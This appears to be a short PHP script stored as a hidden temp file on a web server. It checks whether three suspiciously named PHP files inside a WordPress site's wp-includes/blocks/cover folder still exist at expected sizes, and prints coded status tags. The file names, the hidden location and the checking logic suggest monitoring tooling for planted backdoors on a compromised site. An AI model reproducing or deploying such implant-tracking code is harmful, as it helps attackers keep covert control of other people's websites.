File: //proc/self/root/usr/tmp/.dchunk
<?php $r = '/home/iideug/public_html/raeqah.iideug.com'; $x = ["/wp-includes/blocks/cover/fix_setup_file.php"=>"bd@@1463671@@866",
"/wp-includes/blocks/cover/tot_accept01.php"=>"bd@@1462397@@907",
"/wp-includes/blocks/cover/edit.menu.php"=>"bd@@1471113@@1001"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');